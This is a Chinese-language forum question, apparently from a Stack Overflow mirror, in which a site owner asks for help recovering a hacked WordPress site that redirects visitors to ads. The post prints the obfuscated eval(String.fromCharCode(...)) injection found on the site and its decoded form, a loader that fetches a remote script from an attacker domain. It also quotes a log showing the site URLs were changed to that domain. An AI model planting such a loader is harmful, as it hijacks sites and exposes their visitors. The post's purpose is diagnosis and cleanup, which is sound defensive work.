jquery - 如何检索被黑客入侵的wordpress网站

因此，基本上我客户的网站被黑了，每次我打开时，它都会重定向到另一个网站（多数是广告）。

它的行为，每次我运行网站时，它都会自动更改主URL和站点URL。

我尝试过，我在cpanel中更改了主页URL和站点URL，但再次运行了它重定向的站点。然后它也会自动更改为cpanel中的该地址。

在cpanel中更改url之后，直到运行前端，我都可以访问后端。我使用Sucuri插件进行了扫描，以下显示了错误消息，

11: 1569826918_2:"Error: admin, 122.160.112.18; General settings changed: (multiple entries): siteurl: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/t3.js?',home: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/a3.js?'"

站点地址出于隐私原因而更改。重定向网址在那里。

我检查了所有可能的文件，但是找不到任何可疑的代码。谁能帮我。

编辑：经过几个小时的研究，我发现这是从下面的加密代码注入的， eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,55,57,57,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59));

当我从此站点https://malwaredecoder.com/解密此代码时，我得到了，

eval( (function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = 'https://bes.belaterbewasthere.com/corn/flex.js?tp=799'; document.getElementsByTagName("head")[0].appendChild(elem); })();); 是!即重定向了网址https://bes.belaterbewasthere.com并引发广告。

如何检索被黑客入侵的wordpress网站

1 个答案: